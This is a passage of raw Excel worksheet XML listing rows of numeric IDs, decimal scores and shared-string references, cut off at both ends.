        <v>0.99870002269744873</v>
      </c>
      <c r="F3983" t="s">
        <v>5592</v>
      </c>
      <c r="G3983" t="s">
        <v>7877</v>
      </c>
      <c r="H3983" t="s">
        <v>7878</v>
      </c>
    </row>
    <row r="3984" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3984" s="1">
        <v>3982</v>
      </c>
      <c r="B3984">
        <v>1597</v>
      </c>
      <c r="C3984">
        <v>1597</v>
      </c>
      <c r="D3984">
        <v>2</v>
      </c>
      <c r="E3984">
        <v>0.88859999179840088</v>
      </c>
      <c r="F3984" t="s">
        <v>5592</v>
      </c>
      <c r="G3984" t="s">
        <v>7879</v>
      </c>
      <c r="H3984" t="s">
        <v>7880</v>
      </c>
    </row>
    <row r="3985" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3985" s="1">
        <v>3983</v>
      </c>
      <c r="B3985">
        <v>1598</v>
      </c>
      <c r="C3985">
        <v>1598</v>
      </c>
      <c r="D3985">
        <v>2</v>
      </c>
      <c r="E3985">
        <v>0.99269998073577881</v>
      </c>
      <c r="F3985" t="s">
        <v>5592</v>
      </c>
      <c r="G3985" t="s">
        <v>7881</v>
      </c>
      <c r="H3985" t="s">
        <v>7882</v>
      </c>
    </row>
    <row r="3986" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3986" s="1">
        <v>3984</v>
      </c>
      <c r="B3986">
        <v>7206</v>
      </c>
      <c r="C3986">
        <v>7206</v>
      </c>
      <c r="D3986">
        <v>2</v>
      </c>
      <c r="E3986">
        <v>0.93830001354217529</v>
      </c>
      <c r="F3986" t="s">
        <v>5592</v>
      </c>
      <c r="G3986" t="s">
        <v>7883</v>
      </c>
      <c r="H3986" t="s">
        <v>7884</v>
      </c>
    </row>
    <row r="3987" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3987" s="1">
        <v>3985</v>
      </c>
      <c r="B3987">
        <v>1601</v>
      </c>
      <c r="C3987">
        <v>1601</v>
      </c>
      <c r="D3987">
        <v>2</v>
      </c>
      <c r="E3987">
        <v>0.85199999809265137</v>
      </c>
      <c r="F3987" t="s">
        <v>5592</v>
      </c>
      <c r="G3987" t="s">
        <v>7885</v>
      </c>
      <c r="H3987" t="s">
        <v>7886</v>
      </c>
    </row>
    <row r="3988" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3988" s="1">
        <v>3986</v>
      </c>
      <c r="B3988">
        <v>1602</v>
      </c>
      <c r="C3988">
        <v>1602</v>
      </c>
      <c r="D3988">
        <v>2</v>
      </c>
      <c r="E3988">
        <v>0.86570000648498535</v>
      </c>
      <c r="F3988" t="s">
        <v>5592</v>
      </c>
      <c r="G3988" t="s">
        <v>7887</v>
      </c>
      <c r="H3988" t="s">
        <v>7888</v>
      </c>
    </row>
    <row r="3989" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3989" s="1">
        <v>3987</v>
      </c>
      <c r="B3989">
        <v>7205</v>
      </c>
      <c r="C3989">
        <v>7205</v>
      </c>
      <c r="D3989">
        <v>2</v>
      </c>
      <c r="E3989">
        <v>0.67930001020431519</v>
      </c>
      <c r="F3989" t="s">
        <v>5592</v>
      </c>
      <c r="G3989" t="s">
        <v>7889</v>
      </c>
      <c r="H3989" t="s">
        <v>7890</v>
      </c>
    </row>
    <row r="3990" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3990" s="1">
        <v>3988</v>
      </c>
      <c r="B3990">
        <v>1605</v>
      </c>
      <c r="C3990">
        <v>1605</v>
      </c>
      <c r="D3990">
        <v>2</v>
      </c>
      <c r="E3990">
        <v>0.93209999799728394</v>
      </c>
      <c r="F3990" t="s">
        <v>5592</v>
      </c>
      <c r="G3990" t="s">
        <v>7891</v>
      </c>
      <c r="H3990" t="s">
        <v>7892</v>
      </c>
    </row>
    <row r="3991" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3991" s="1">
        <v>3989</v>
      </c>
      <c r="B3991">
        <v>7204</v>
      </c>
      <c r="C3991">
        <v>7204</v>
      </c>
      <c r="D3991">
        <v>2</v>
      </c>
      <c r="E3991">
        <v>0.96710002422332764</v>
      </c>
      <c r="F3991" t="s">
        <v>5592</v>
      </c>
      <c r="G3991" t="s">
        <v>7893</v>
      </c>
      <c r="H3991" t="s">
        <v>7894</v>
      </c>
    </row>
    <row r="3992" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3992" s="1">
        <v>3990</v>
      </c>
      <c r="B3992">
        <v>1607</v>
      </c>
      <c r="C3992">
        <v>1607</v>
      </c>
      <c r="D3992">
        <v>2</v>
      </c>
      <c r="E3992">
        <v>0.97259998321533203</v>
      </c>
      <c r="F3992" t="s">
        <v>5592</v>
      </c>
      <c r="G3992" t="s">
        <v>7895</v>
      </c>
      <c r="H3992" t="s">
        <v>7896</v>
      </c>
    </row>
    <row r="3993" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3993" s="1">
        <v>3991</v>
      </c>
      <c r="B3993">
        <v>7225</v>
      </c>
      <c r="C3993">
        <v>7225</v>
      </c>
      <c r="D3993">
        <v>2</v>
      </c>
      <c r="E3993">
        <v>0.72229999303817749</v>
      </c>
      <c r="F3993" t="s">
        <v>5592</v>
      </c>
      <c r="G3993" t="s">
        <v>7897</v>
      </c>
      <c r="H3993" t="s">
        <v>7898</v>
      </c>
    </row>
    <row r="3994" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3994" s="1">
        <v>3992</v>
      </c>
      <c r="B3994">
        <v>7226</v>
      </c>
      <c r="C3994">
        <v>7226</v>
      </c>
      <c r="D3994">
        <v>2</v>
      </c>
      <c r="E3994">
        <v>0.58859997987747192</v>
      </c>
      <c r="F3994" t="s">
        <v>5592</v>
      </c>
      <c r="G3994" t="s">
        <v>7899</v>
      </c>
      <c r="H3994" t="s">
        <v>7900</v>
      </c>
    </row>
    <row r="3995" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3995" s="1">
        <v>3993</v>
      </c>
      <c r="B3995">
        <v>7227</v>
      </c>
      <c r="C3995">
        <v>7227</v>
      </c>
      <c r="D3995">
        <v>2</v>
      </c>
      <c r="E3995">
        <v>0.49950000643730158</v>
      </c>
      <c r="F3995" t="s">
        <v>5592</v>
      </c>
      <c r="G3995" t="s">
        <v>7901</v>
      </c>
      <c r="H3995" t="s">
        <v>7872</v>
      </c>
    </row>
    <row r="3996" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3996" s="1">
        <v>3994</v>
      </c>
      <c r="B3996">
        <v>7228</v>
      </c>
      <c r="C3996">
        <v>7228</v>
      </c>
      <c r="D3996">
        <v>2</v>
      </c>
      <c r="E3996">
        <v>0.83039999008178711</v>
      </c>
      <c r="F3996" t="s">
        <v>5592</v>
      </c>
      <c r="G3996" t="s">
        <v>7902</v>
      </c>
      <c r="H3996" t="s">
        <v>7903</v>
      </c>
    </row>
    <row r="3997" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3997" s="1">
        <v>3995</v>
      </c>
      <c r="B3997">
        <v>7248</v>
      </c>
      <c r="C3997">
        <v>7248</v>
      </c>
      <c r="D3997">
        <v>2</v>
      </c>
      <c r="E3997">
        <v>0.93690001964569092</v>
      </c>
      <c r="F3997" t="s">
        <v>5592</v>
      </c>
      <c r="G3997" t="s">
        <v>7904</v>
      </c>
      <c r="H3997" t="s">
        <v>7905</v>
      </c>
    </row>
    <row r="3998" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3998" s="1">
        <v>3996</v>
      </c>
      <c r="B3998">
        <v>1496</v>
      </c>
      <c r="C3998">
        <v>1496</v>
      </c>
      <c r="D3998">
        <v>2</v>
      </c>
      <c r="E3998">
        <v>0.83939999341964722</v>
      </c>
      <c r="F3998" t="s">
        <v>5592</v>
      </c>
      <c r="G3998" t="s">
        <v>7906</v>
      </c>
      <c r="H3998" t="s">
        <v>7907</v>
      </c>
    </row>
    <row r="3999" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3999" s="1">
        <v>3997</v>
      </c>
      <c r="B3999">
        <v>1497</v>
      </c>
      <c r="C3999">
        <v>1497</v>
      </c>
      <c r="D3999">
        <v>2</v>
      </c>
      <c r="E3999">
        <v>0.83950001001358032</v>
      </c>
      <c r="F3999" t="s">
        <v>5592</v>
      </c>
      <c r="G3999" t="s">
        <v>7908</v>
      </c>
      <c r="H3999" t="s">
        <v>7907</v>
      </c>
    </row>
    <row r="4000" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4000" s="1">
        <v>3998</v>
      </c>
      <c r="B4000">
        <v>1498</v>
      </c>
      <c r="C4000">
        <v>1498</v>
      </c>
      <c r="D4000">
        <v>2</v>
      </c>
      <c r="E4000">
        <v>0.99750000238418579</v>
      </c>
      <c r="F4000" t="s">
        <v>5592</v>
      </c>
      <c r="G4000" t="s">
        <v>7909</v>
      </c>
      <c r="H4000" t="s">
        <v>7910</v>
      </c>
    </row>
    <row r="4001" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4001" s="1">
        <v>3999</v>
      </c>
      <c r="B4001">
        <v>7243</v>
      </c>
      <c r="C4001">
        <v>7243</v>
      </c>
      <c r="D4001">
        <v>2</v>
      </c>
      <c r="E4001">
        <v>0.99639999866485596</v>
      </c>
      <c r="F4001" t="s">
        <v>5592</v>
      </c>
      <c r="G4001" t="s">
        <v>7911</v>
      </c>
      <c r="H4001" t="s">
        <v>7912</v>
      </c>
    </row>
    <row r="4002" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4002" s="1">
        <v>4000</v>
      </c>
      <c r="B4002">
        <v>1505</v>
      </c>
      <c r="C4002">
        <v>1505</v>
      </c>
      <c r="D4002">
        <v>2</v>
      </c>
      <c r="E4002">
        <v>0.50709998607635498</v>
      </c>
      <c r="F4002" t="s">
        <v>5592</v>
      </c>
      <c r="G4002" t="s">
        <v>7913</v>
      </c>
      <c r="H4002" t="s">
        <v>7914</v>
      </c>
    </row>
    <row r="4003" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4003" s="1">
        <v>4001</v>
      </c>
      <c r="B4003">
        <v>1506</v>
      </c>
      <c r="C4003">
        <v>1506</v>
      </c>
      <c r="D4003">
        <v>2</v>
      </c>
      <c r="E4003">
        <v>0.54989999532699585</v>
      </c>
      <c r="F4003" t="s">
        <v>5592</v>
      </c>
      <c r="G4003" t="s">
        <v>7915</v>
      </c>
      <c r="H4003" t="s">
        <v>7916</v>
      </c>
    </row>
    <row r="4004" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4004" s="1">
        <v>4002</v>
      </c>
      <c r="B4004">
        <v>1508</v>
      </c>
      <c r="C4004">
        <v>1508</v>
      </c>
      <c r="D4004">
        <v>2</v>
      </c>
      <c r="E4004">
        <v>0.99500000476837158</v>
      </c>
      <c r="F4004" t="s">
        <v>5592</v>
      </c>
      <c r="G4004" t="s">
        <v>7917</v>
      </c>
      <c r="H4004" t="s">
        <v>7918</v>
      </c>
    </row>
    <row r="4005" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4005" s="1">
        <v>4003</v>
      </c>
      <c r="B4005">
        <v>1510</v>
      </c>
      <c r="C4005">
        <v>1510</v>
      </c>
      <c r="D4005">
        <v>2</v>
      </c>
      <c r="E4005">
        <v>0.48309999704360962</v>
      </c>
      <c r="F4005" t="s">
        <v>5592</v>
      </c>
      <c r="G4005" t="s">
        <v>7919</v>
      </c>
      <c r="H4005" t="s">
        <v>7920</v>
      </c>
    </row>
    <row r="4006" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4006" s="1">
        <v>4004</v>
      </c>
      <c r="B4006">
        <v>1519</v>
      </c>
      <c r="C4006">
        <v>1519</v>
      </c>
      <c r="D4006">
        <v>2</v>
      </c>
      <c r="E4006">
        <v>0.99470001459121704</v>
      </c>
      <c r="F4006" t="s">
        <v>5592</v>
      </c>
      <c r="G4006" t="s">
        <v>7921</v>
      </c>
      <c r="H4006" t="s">
        <v>7922</v>
      </c>
    </row>
    <row r="4007" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4007" s="1">
        <v>4005</v>
      </c>
      <c r="B4007">
        <v>7203</v>
      </c>
      <c r="C4007">
        <v>7203</v>
      </c>
      <c r="D4007">
        <v>2</v>
      </c>
      <c r="E4007">
        <v>0.97500002384185791</v>
      </c>
      <c r="F4007" t="s">
        <v>5592</v>
      </c>
      <c r="G4007" t="s">
        <v>7923</v>
      </c>
      <c r="H4007" t="s">
        <v>7924</v>
      </c>
    </row>
    <row r="4008" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4008" s="1">
        <v>4006</v>
      </c>
      <c r="B4008">
        <v>1521</v>
      </c>
      <c r="C4008">
        <v>1521</v>
      </c>
      <c r="D4008">
        <v>2</v>
      </c>
      <c r="E4008">
        <v>0.71170002222061157</v>
      </c>
      <c r="F4008" t="s">
        <v>5592</v>
      </c>
      <c r="G4008" t="s">
        <v>7925</v>
      </c>
      <c r="H4008" t="s">
        <v>7926</v>
      </c>
    </row>
    <row r="4009" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4009" s="1">
        <v>4007</v>
      </c>
      <c r="B4009">
        <v>1528</v>
      </c>
      <c r="C4009">
        <v>1528</v>
      </c>
      <c r="D4009">
        <v>2</v>
      </c>
      <c r="E4009">
        <v>0.42140001058578491</v>
      </c>
      <c r="F4009" t="s">
        <v>5592</v>
      </c>
      <c r="G4009" t="s">
        <v>7927</v>
      </c>
      <c r="H4009" t="s">
        <v>7928</v>
      </c>
    </row>
    <row r="4010" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4010" s="1">
        <v>4008</v>
      </c>
      <c r="B4010">
        <v>1529</v>
      </c>
      <c r="C4010">
        <v>1529</v>
      </c>
      <c r="D4010">
        <v>2</v>
      </c>
      <c r="E4010">
        <v>0.59020000696182251</v>
      </c>
      <c r="F4010" t="s">
        <v>5592</v>
      </c>
      <c r="G4010" t="s">
        <v>7929</v>
      </c>
      <c r="H4010" t="s">
        <v>7930</v>
      </c>
    </row>
    <row r="4011" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4011" s="1">
        <v>4009</v>
      </c>
      <c r="B4011">
        <v>1530</v>
      </c>
      <c r="C4011">
        <v>1530</v>
      </c>
      <c r="D4011">
        <v>2</v>
      </c>
      <c r="E4011">
        <v>0.76579999923706055</v>
      </c>
      <c r="F4011" t="s">
        <v>5592</v>
      </c>
      <c r="G4011" t="s">
        <v>7931</v>
      </c>
      <c r="H4011" t="s">
        <v>7932</v>
      </c>
    </row>
    <row r="4012" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4012" s="1">
        <v>4010</v>
      </c>
      <c r="B4012">
        <v>1533</v>
      </c>
      <c r="C4012">
        <v>1533</v>
      </c>
      <c r="D4012">
        <v>2</v>
      </c>
      <c r="E4012">
        <v>0.61140000820159912</v>
      </c>
      <c r="F4012" t="s">
        <v>5592</v>
      </c>
      <c r="G4012" t="s">
        <v>7933</v>
      </c>
      <c r="H4012" t="s">
        <v>7934</v>
      </c>
    </row>
    <row r="4013" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4013" s="1">
        <v>4011</v>
      </c>
      <c r="B4013">
        <v>1534</v>
      </c>
      <c r="C4013">
        <v>1534</v>
      </c>
      <c r="D4013">
        <v>2</v>
      </c>
      <c r="E4013">
        <v>0.8564000129699707</v>
      </c>
      <c r="F4013" t="s">
        <v>5592</v>
      </c>
      <c r="G4013" t="s">
        <v>7935</v>
      </c>
      <c r="H4013" t="s">
        <v>7936</v>
      </c>
    </row>
    <row r="4014" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4014" s="1">
        <v>4012</v>
      </c>
      <c r="B4014">
        <v>7234</v>
      </c>
      <c r="C4014">
        <v>7234</v>
      </c>
      <c r="D4014">
        <v>2</v>
      </c>
      <c r="E4014">
        <v>0.57810002565383911</v>
      </c>
      <c r="F4014" t="s">
        <v>5592</v>
      </c>
      <c r="G4014" t="s">
        <v>7937</v>
      </c>
      <c r="H4014" t="s">
        <v>7938</v>
      </c>
    </row>
    <row r="4015" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4015" s="1">
        <v>4013</v>
      </c>
      <c r="B4015">
        <v>1538</v>
      </c>
      <c r="C4015">
        <v>1538</v>
      </c>
      <c r="D4015">
        <v>2</v>
      </c>
      <c r="E4015">
        <v>0.99210000038146973</v>
      </c>
      <c r="F4015" t="s">
        <v>5592</v>
      </c>
      <c r="G4015" t="s">
        <v>7939</v>
      </c>
      <c r="H4015" t="s">
        <v>7940</v>
      </c>
    </row>
    <row r="4016" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4016" s="1">
        <v>4014</v>
      </c>
      <c r="B4016">
        <v>1542</v>
      </c>
      <c r="C4016">
        <v>1542</v>
      </c>
      <c r="D4016">
        <v>2</v>
      </c>
      <c r="E4016">
        <v>0.97450000047683716</v>
      </c>
      <c r="F4016" t="s">
        <v>5592</v>
      </c>
      <c r="G4016" t="s">
        <v>7941</v>
      </c>
      <c r="H4016" t="s">
        <v>7942</v>
      </c>
    </row>
    <row r="4017" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4017" s="1">
        <v>4015</v>
      </c>
      <c r="B4017">
        <v>1543</v>
      </c>
      <c r="C4017">
        <v>1543</v>
      </c>
      <c r="D4017">
        <v>2</v>
      </c>
      <c r="E4017">
        <v>0.99849998950958252</v>
      </c>
      <c r="F4017" t="s">
        <v>5592</v>
      </c>
      <c r="G4017" t="s">
        <v>7943</v>
      </c>
      <c r="H4017" t="s">
        <v>7944</v>
      </c>
    </row>
    <row r="4018" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4018" s="1">
        <v>4016</v>
      </c>
      <c r="B4018">
        <v>7229</v>
      </c>
      <c r="C4018">
        <v>7229</v>
      </c>
      <c r="D4018">
        <v>2</v>
      </c>
      <c r="E4018">
        <v>0.66670000553131104</v>
      </c>
      <c r="F4018" t="s">
        <v>5592</v>
      </c>
      <c r="G4018" t="s">
        <v>7945</v>
      </c>
      <c r="H4018" t="s">
        <v>7946</v>
      </c>
    </row>
    <row r="4019" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4019" s="1">
        <v>4017</v>
      </c>
      <c r="B4019">
        <v>1523</v>
      </c>
      <c r="C4019">
        <v>1523</v>
      </c>
      <c r="D4019">
        <v>2</v>
      </c>
      <c r="E4019">
        <v>0.55110001564025879</v>
      </c>
      <c r="F4019" t="s">
        <v>5592</v>
      </c>
      <c r="G4019" t="s">
        <v>7947</v>
      </c>
      <c r="H4019" t="s">
        <v>7948</v>
      </c>
    </row>
    <row r="4020" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4020" s="1">
        <v>4018</v>
      </c>
      <c r="B4020">
        <v>7194</v>
      </c>
      <c r="C4020">
        <v>7194</v>
      </c>
      <c r="D4020">
        <v>2</v>
      </c>
      <c r="E4020">
        <v>0.84020000696182251</v>
      </c>
      <c r="F4020" t="s">
        <v>5592</v>
      </c>
      <c r="G4020" t="s">
        <v>7949</v>
      </c>
      <c r="H4020" t="s">
        <v>7950</v>
      </c>
    </row>
    <row r="4021" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4021" s="1">
        <v>4019</v>
      </c>
      <c r="B4021">
        <v>7190</v>
      </c>
      <c r="C4021">
        <v>7190</v>
      </c>
      <c r="D4021">
        <v>2</v>
      </c>
      <c r="E4021">
        <v>0.61210000514984131</v>
      </c>
      <c r="F4021" t="s">
        <v>5592</v>
      </c>
      <c r="G4021" t="s">
        <v>7951</v>
      </c>
      <c r="H4021" t="s">
        <v>6140</v>
      </c>
    </row>
    <row r="4022" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4022" s="1">
        <v>4020</v>
      </c>
      <c r="B4022">
        <v>7186</v>
      </c>
      <c r="C4022">
        <v>7186</v>
      </c>
      <c r="D4022">
        <v>2</v>
      </c>
      <c r="E4022">
        <v>0.99550002813339233</v>
      </c>
      <c r="F4022" t="s">
        <v>5592</v>
      </c>
      <c r="G4022" t="s">
        <v>7952</v>
      </c>
      <c r="H4022" t="s">
        <v>7953</v>
      </c>
    </row>
    <row r="4023" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4023" s="1">
        <v>4021</v>
      </c>
      <c r="B4023">
        <v>1721</v>
      </c>
      <c r="C4023">
        <v>1721</v>
      </c>
      <c r="D4023">
        <v>2</v>
      </c>
      <c r="E4023">
        <v>0.67500001192092896</v>
      </c>
      <c r="F4023" t="s">
        <v>5592</v>
      </c>
      <c r="G4023" t="s">
        <v>7954</v>
      </c>
      <c r="H4023" t="s">
        <v>7955</v>
      </c>
    </row>
    <row r="4024" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4024" s="1">
        <v>4022</v>
      </c>
      <c r="B4024">
        <v>1745</v>
      </c>
      <c r="C4024">
        <v>1745</v>
      </c>
      <c r="D4024">
        <v>2</v>
      </c>
      <c r="E4024">
        <v>0.69120001792907715</v>
      </c>
      <c r="F4024" t="s">
        <v>5592</v>
      </c>
      <c r="G4024" t="s">
        <v>7956</v>
      </c>
      <c r="H4024" t="s">
        <v>7957</v>
      </c>
    </row>
    <row r="4025" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4025" s="1">
        <v>4023</v>
      </c>
      <c r="B4025">
        <v>7139</v>
      </c>
      <c r="C4025">
        <v>7139</v>
      </c>
      <c r="D4025">
        <v>2</v>
      </c>
      <c r="E4025">
        <v>0.50770002603530884</v>
      </c>
      <c r="F4025" t="s">
        <v>5592</v>
      </c>
      <c r="G4025" t="s">
        <v>7958</v>
      </c>
      <c r="H4025" t="s">
        <v>7959</v>
      </c>
    </row>
    <row r="4026" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4026" s="1">
        <v>4024</v>
      </c>
      <c r="B4026">
        <v>1753</v>
      </c>
      <c r="C4026">
        <v>1753</v>
      </c>
      <c r="D4026">
        <v>2</v>
      </c>
      <c r="E4026">
        <v>0.99570000171661377</v>
      </c>
      <c r="F4026" t="s">
        <v>5592</v>
      </c>
      <c r="G4026" t="s">
        <v>7960</v>
      </c>
      <c r="H4026" t="s">
        <v>7961</v>
      </c>
    </row>
    <row r="4027" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4027" s="1">
        <v>4025</v>
      </c>
      <c r="B4027">
        <v>1756</v>
      </c>
      <c r="C4027">
        <v>1756</v>
      </c>
      <c r="D4027">
        <v>2</v>
      </c>
      <c r="E4027">
        <v>0.48339998722076422</v>
      </c>
      <c r="F4027" t="s">
        <v>5592</v>
      </c>
      <c r="G4027" t="s">
        <v>7962</v>
      </c>
      <c r="H4027" t="s">
        <v>7963</v>
      </c>
    </row>
    <row r="4028" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4028" s="1">
        <v>4026</v>
      </c>
      <c r="B4028">
        <v>7135</v>
      </c>
      <c r="C4028">
        <v>7135</v>
      </c>
      <c r="D4028">
        <v>2</v>
      </c>
      <c r="E4028">
        <v>0.51410001516342163</v>
      </c>
      <c r="F4028" t="s">
        <v>5592</v>
      </c>
      <c r="G4028" t="s">
        <v>7964</v>
      </c>
      <c r="H4028" t="s">
        <v>7965</v>
      </c>
    </row>
    <row r="4029" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4029" s="1">
        <v>4027</v>
      </c>
      <c r="B4029">
        <v>1765</v>
      </c>
      <c r="C4029">
        <v>1765</v>
      </c>
      <c r="D4029">
        <v>2</v>
      </c>
      <c r="E4029">
        <v>0.91720002889633179</v>
      </c>
      <c r="F4029" t="s">
        <v>5592</v>
      </c>
      <c r="G4029" t="s">
        <v>7966</v>
      </c>
      <c r="H4029" t="s">
        <v>7967</v>
      </c>
    </row>
    <row r="4030" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4030" s="1">
        <v>4028</v>
      </c>
      <c r="B4030">
        <v>1770</v>
      </c>
      <c r="C4030">
        <v>1770</v>
      </c>
      <c r="D4030">
        <v>2</v>
      </c>
      <c r="E4030">
        <v>0.76529997587203979</v>
      </c>
      <c r="F4030" t="s">
        <v>5592</v>
      </c>
      <c r="G4030" t="s">
        <v>7968</v>
      </c>
      <c r="H4030" t="s">
        <v>7969</v>
      </c>
    </row>
    <row r="4031" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4031" s="1">
        <v>4029</v>
      </c>
      <c r="B4031">
        <v>1771</v>
      </c>
      <c r="C4031">
        <v>1771</v>
      </c>
      <c r="D4031">
        <v>2</v>
      </c>
      <c r="E4031">
        <v>0.36989998817443848</v>
      </c>
      <c r="F4031" t="s">
        <v>5592</v>
      </c>
      <c r="G4031" t="s">
        <v>7970</v>
      </c>
      <c r="H4031" t="s">
        <v>7971</v>
      </c>
    </row>
    <row r="4032" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4032" s="1">
        <v>4030</v>
      </c>
      <c r="B4032">
        <v>1776</v>
      </c>
      <c r="C4032">
        <v>1776</v>
      </c>
      <c r="D4032">
        <v>2</v>
      </c>
      <c r="E4032">
        <v>0.43689998984336847</v>
      </c>
      <c r="F4032" t="s">
        <v>5592</v>
      </c>
      <c r="G4032" t="s">
        <v>7972</v>
      </c>
      <c r="H4032" t="s">
        <v>7973</v>
      </c>
    </row>
    <row r="4033" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4033" s="1">
        <v>4031</v>
      </c>
      <c r="B4033">
        <v>7147</v>
      </c>
      <c r="C4033">
        <v>7147</v>
      </c>
      <c r="D4033">
        <v>2</v>
      </c>
      <c r="E4033">
        <v>0.43619999289512629</v>
      </c>
      <c r="F4033" t="s">
        <v>5592</v>
      </c>
      <c r="G4033" t="s">
        <v>7974</v>
      </c>
      <c r="H4033" t="s">
        <v>7975</v>
      </c>
    </row>
    <row r="4034" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4034" s="1">
        <v>4032</v>
      </c>
      <c r="B4034">
        <v>1778</v>
      </c>
      <c r="C4034">
        <v>1778</v>
      </c>
      <c r="D4034">
        <v>2</v>
      </c>
      <c r="E4034">
        <v>0.99839997291564941</v>
      </c>
      <c r="F4034" t="s">
        <v>5592</v>
      </c>
      <c r="G4034" t="s">
        <v>7976</v>
      </c>
      <c r="H4034" t="s">
        <v>7977</v>
      </c>
    </row>
    <row r="4035" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4035" s="1">
        <v>4033</v>
      </c>
      <c r="B4035">
        <v>7122</v>
      </c>
      <c r="C4035">
        <v>7122</v>
      </c>
      <c r="D4035">
        <v>2</v>
      </c>
      <c r="E4035">
        <v>0.99489998817443848</v>
      </c>
      <c r="F4035" t="s">
        <v>5592</v>
      </c>
      <c r="G4035" t="s">
        <v>7978</v>
      </c>
      <c r="H4035" t="s">
        <v>7979</v>
      </c>
    </row>
    <row r="4036" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4036" s="1">
        <v>4034</v>
      </c>
      <c r="B4036">
        <v>1783</v>
      </c>
      <c r="C4036">
        <v>1783</v>
      </c>
      <c r="D4036">
        <v>2</v>
      </c>
      <c r="E4036">
        <v>0.56279999017715454</v>
      </c>
      <c r="F4036" t="s">
        <v>5592</v>
      </c>
      <c r="G4036" t="s">
        <v>7980</v>
      </c>
      <c r="H4036" t="s">
        <v>7981</v>
      </c>
    </row>
    <row r="4037" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4037" s="1">
        <v>4035</v>
      </c>
      <c r="B4037">
        <v>7121</v>
      </c>
      <c r="C4037">
        <v>7121</v>
      </c>
      <c r="D4037">
        <v>2</v>
      </c>
      <c r="E4037">
        <v>0.99790000915527344</v>
      </c>
      <c r="F4037" t="s">
        <v>5592</v>
      </c>
      <c r="G4037" t="s">
        <v>7982</v>
      </c>
      <c r="H4037" t="s">
        <v>7983</v>
      </c>
    </row>
    <row r="4038" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4038" s="1">
        <v>4036</v>
      </c>
      <c r="B4038">
        <v>1785</v>
      </c>
      <c r="C4038">
        <v>1785</v>
      </c>
      <c r="D4038">
        <v>2</v>
      </c>
      <c r="E4038">
        <v>0.44139999151229858</v>
      </c>
      <c r="F4038" t="s">
        <v>5592</v>
      </c>
      <c r="G4038" t="s">
        <v>7984</v>
      </c>
      <c r="H4038" t="s">
        <v>7985</v>
      </c>
    </row>
    <row r="4039" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4039" s="1">
        <v>4037</v>
      </c>
      <c r="B4039">
        <v>7120</v>
      </c>
      <c r="C4039">
        <v>7120</v>
      </c>
      <c r="D4039">
        <v>2</v>
      </c>
      <c r="E4039">
        <v>0.62139999866485596</v>
      </c>
      <c r="F4039" t="s">
        <v>5592</v>
      </c>
      <c r="G4039" t="s">
        <v>7986</v>
      </c>
      <c r="H4039" t="s">
        <v>7987</v>
      </c>
    </row>
    <row r="4040" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4040" s="1">
        <v>4038</v>
      </c>
      <c r="B4040">
        <v>1787</v>
      </c>
      <c r="C4040">
        <v>1787</v>
      </c>
      <c r="D4040">
        <v>2</v>
      </c>
      <c r="E4040">
        <v>0.64270001649856567</v>
      </c>
      <c r="F4040" t="s">
        <v>5592</v>
      </c>
      <c r="G4040" t="s">
        <v>7988</v>
      </c>
      <c r="H4040" t="s">
        <v>7989</v>
      </c>
    </row>
    <row r="4041" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4041" s="1">
        <v>4039</v>
      </c>
      <c r="B4041">
        <v>1796</v>
      </c>
      <c r="C4041">
        <v>1796</v>
      </c>
      <c r="D4041">
        <v>2</v>
      </c>
      <c r="E4041">
        <v>0.99959999322891235</v>
      </c>
      <c r="F4041" t="s">
        <v>5592</v>
      </c>
      <c r="G4041" t="s">
        <v>7990</v>
      </c>
      <c r="H4041" t="s">
